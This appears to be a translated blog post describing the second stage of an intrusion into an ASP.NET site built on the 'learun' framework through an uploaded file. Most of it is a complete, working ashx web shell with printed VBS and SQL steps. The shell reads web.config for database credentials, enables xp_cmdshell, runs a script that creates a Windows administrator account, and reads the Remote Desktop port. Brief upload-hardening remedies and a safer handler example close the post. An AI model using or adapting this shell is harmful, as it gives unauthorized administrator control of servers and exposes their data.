The author only has a primary-school education and is poor at organizing language, so please bear with the writing; if you don't like it, don't flame.
Last time I talked about how to get into a server through a file upload; this time we go a bit further.
Let's go over the process first:
1. The upload code page I uploaded is an ashx page.
2. The ashx page displays web.config as text; the config contains the database connection string.
3. The ashx page writes a VBS script (one that creates a Windows account) into the website root directory.
4. Enable xp_cmdshell in the database.
5. Use the database to execute the VBS script that was written to the site root. The intrusion is complete.
The ashx code file is as follows:
using System;
using System.Data.SqlClient;
using System.Web;

/// <summary>
/// Display the configuration file
/// </summary>
/// <param name="context"></param>
public void ShowWebConfig(HttpContext context)
{
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
}

/// <summary>
/// Write the VBS script
/// </summary>
/// <param name="context"></param>
public void WriteVbs(HttpContext context)
{
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"),
        "set wsnetwork=createobject(\"WSCRIPT.NETWORK\")\r\n" +
        "os=\"winnt://\"&wsnetwork.ComputerName\r\n" +
        "set ob=getobject(os) ' get ADSI interface, bind\r\n" +
        "set oe=getobject(os&\"/administrators,group\") ' attribute, admin group\r\n" +
        "set od=ob.Create(\"user\",\"test\") ' create user\r\n" +
        "od.SetPassword \"1234\" ' set password\r\n" +
        "od.SetInfo ' save\r\n" +
        "set of=getobject(os&\"/test\",user) ' get user\r\n" +
        "oe.add os&\"/freeast\"\r\n");
}

/// <summary>
/// Execute a statement against the database
/// </summary>
/// <param name="connection"></param>
/// <param name="sql"></param>
public void ExecuteSQL(string connection, string sql)
{
    using (SqlConnection con = new SqlConnection(connection))
    {
        using (SqlCommand commd = new SqlCommand(sql, con))
        {
            con.Open();
            commd.ExecuteNonQuery();
            con.Close();
        }
    }
}

/// <summary>
/// Execute a query against the database and output the result table
/// </summary>
/// <param name="context"></param>
/// <param name="connection"></param>
/// <param name="sql"></param>
public void ExecuteSQL1(HttpContext context, string connection, string sql)
{
    System.Data.DataTable table = new System.Data.DataTable();
    using (SqlConnection con = new SqlConnection(connection))
    {
        using (SqlCommand commd = new SqlCommand(sql, con))
        {
            con.Open();
            using (SqlDataAdapter ad = new SqlDataAdapter(commd))
            {
                ad.Fill(table);
            }
            con.Close();
        }
    }
    foreach (System.Data.DataRow row in table.Rows)
    {
        foreach (System.Data.DataColumn column in table.Columns)
        {
            context.Response.Write(row[column]);
            context.Response.Write("\t");
        }
        context.Response.Write("\r\n");
    }
}

/// <summary>
/// Show the Remote Desktop port
/// </summary>
/// <param name="context"></param>
private void ShowPort(HttpContext context)
{
    context.Response.Write(Microsoft.Win32.Registry.LocalMachine
        .OpenSubKey(@"system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp")
        .GetValue("PortNumber").ToString());
}

public void ProcessRequest(HttpContext context)
{
    context.Response.ContentType = "text/plain";
    try
    {
        var connection = context.Request.QueryString["Connection"];
        switch (context.Request.QueryString["Method"])
        {
            case "1":
                WriteVbs(context);
                break;
            case "2":
                ExecuteSQL(connection, @"sp_configure 'show advanced options', 1 reconfigure");
                ExecuteSQL(connection, @"sp_configure 'xp_cmdshell', 1 reconfigure"); // enable xp_cmdshell in the database
                break;
            case "3":
                ExecuteSQL1(context, connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
                break;
            case "4":
                ShowPort(context);
                break;
            default:
                ShowWebConfig(context);
                break;
        }
    }
    catch (Exception ex)
    {
        context.Response.Write(ex.Message);
    }
    context.Response.End();
}

public bool IsReusable { get { return false; } }
Here we take the online instance of the "learun information rapid development framework" as an example.
I won't repeat how to upload the file. Last time someone asked me how to display the contents of web.config, so I'm pasting the code here specifically. It is actually very simple: File.ReadAllText on the web.config file is enough.
public void ShowWebConfig(HttpContext context)
{
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
}
After running this line of the ashx you get the database connection string.
Next is the script that creates the Windows account:
set wsnetwork=createobject("WSCRIPT.NETWORK")
os="winnt://"&wsnetwork.ComputerName
set ob=getobject(os)                            ' get ADSI interface, bind
set oe=getobject(os&"/administrators,group")    ' attribute, admin group
set od=ob.Create("user","test")                 ' create user
od.SetPassword "1234"                           ' set password
od.SetInfo                                      ' save
set of=getobject(os&"/test",user)               ' get user
oe.add os&"/freeast"
Then enable xp_cmdshell in the database:
sp_configure 'show advanced options', 1 reconfigure
go
sp_configure 'xp_cmdshell', 1 reconfigure
Finally, execute the VBS script:
exec master..xp_cmdshell 'cscript script file directory'
The results of the run are as follows:
Well, that means it worked .... That is, the server user was added successfully.
Now to get to Remote Desktop. A port scanning tool showed that 3389 is closed, so the port must have been changed, so I added a piece of code that makes the program read the Remote Desktop port from the registry.
The code is as follows:
/// <summary>
/// Show the Remote Desktop port
/// </summary>
/// <param name="context"></param>
private void ShowPort(HttpContext context)
{
    context.Response.Write(Microsoft.Win32.Registry.LocalMachine
        .OpenSubKey(@"system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp")
        .GetValue("PortNumber").ToString());
}
All right, all done here; open Remote Desktop Connection.
Because the victim was notified in time before publication, the hole was patched for him before this was posted, so there is no point in trying -.-!!!!
Then I'll talk about the remedies; I'll just introduce a few:
1. Put uploaded files outside the site, that is, somewhere IIS cannot serve them directly (but remember to assign permissions). For example: if my site is at D:\web\oa\ (the site's own directory), then the files I upload can go into D:\File\OA, where others cannot access them directly.
2. Create a new web.config in the upload directory that denies all requests (C# can still read the files; just output them with Response.WriteFile).
3. Compress everything.
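As an added example (not code from the post or from the learun framework), here is one way to implement remedies 1 and 2 in an ashx handler: uploads are saved under D:\File\OA, outside the site root D:\web\oa, so IIS never executes them, and they are streamed back through Response.WriteFile. The class name, the "file" form field and the "id" query parameter are assumptions.

```csharp
// Added example (not from the original post): one way to apply remedies 1 and 2.
// Uploads are saved under D:\File\OA (the post's example), outside the site root
// D:\web\oa, so IIS can never execute them; the app streams them back with
// Response.WriteFile. Class, form-field and query-parameter names are assumed.
using System;
using System.IO;
using System.Web;

public class SafeUploadHandler : IHttpHandler
{
    private const string StoreRoot = @"D:\File\OA";                 // outside the web root
    private static readonly string[] Allowed = { ".pdf", ".png", ".jpg", ".docx" };

    public void ProcessRequest(HttpContext context)
    {
        if (context.Request.HttpMethod == "POST") Upload(context);
        else Download(context);
    }

    private static void Upload(HttpContext context)
    {
        HttpPostedFile file = context.Request.Files["file"];
        if (file == null || file.ContentLength == 0) { context.Response.StatusCode = 400; return; }
        // Whitelist the extension; everything else about the client-supplied name is discarded.
        string ext = Path.GetExtension(file.FileName).ToLowerInvariant();
        if (Array.IndexOf(Allowed, ext) < 0) { context.Response.StatusCode = 415; return; }
        // Server-generated name: no traversal, no double extensions, no .ashx/.aspx ever lands on disk.
        string stored = Guid.NewGuid().ToString("N") + ext;
        file.SaveAs(Path.Combine(StoreRoot, stored));
        context.Response.ContentType = "text/plain";
        context.Response.Write(stored);                              // handle the caller keeps
    }

    private static void Download(HttpContext context)
    {
        string id = context.Request.QueryString["id"] ?? "";
        // Accept only a bare file name with an allowed extension, then confirm it resolves inside the store.
        if (id != Path.GetFileName(id) || Array.IndexOf(Allowed, Path.GetExtension(id).ToLowerInvariant()) < 0)
        { context.Response.StatusCode = 400; return; }
        string full = Path.GetFullPath(Path.Combine(StoreRoot, id));
        if (!full.StartsWith(StoreRoot + Path.DirectorySeparatorChar, StringComparison.OrdinalIgnoreCase) || !File.Exists(full))
        { context.Response.StatusCode = 404; return; }
        context.Response.ContentType = "application/octet-stream";  // never sniffed as a page
        context.Response.AppendHeader("Content-Disposition", "attachment; filename=\"" + id + "\"");
        context.Response.WriteFile(full);                           // remedy 2: the app streams the bytes
    }

    public bool IsReusable { get { return false; } }
}
```

The application pool identity needs read/write on D:\File\OA and nothing under the site root needs to be writable, which is the permission assignment remedy 1 refers to.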
OK, everybody hurry up and go over your previous projects again and patch them up .... Don't use these holes to do bad things, oh ... or you'll be invited for tea .... -.-!!!!!
ASP.NET website intrusion, second wave (the learun information rapid development framework has been taken by the author)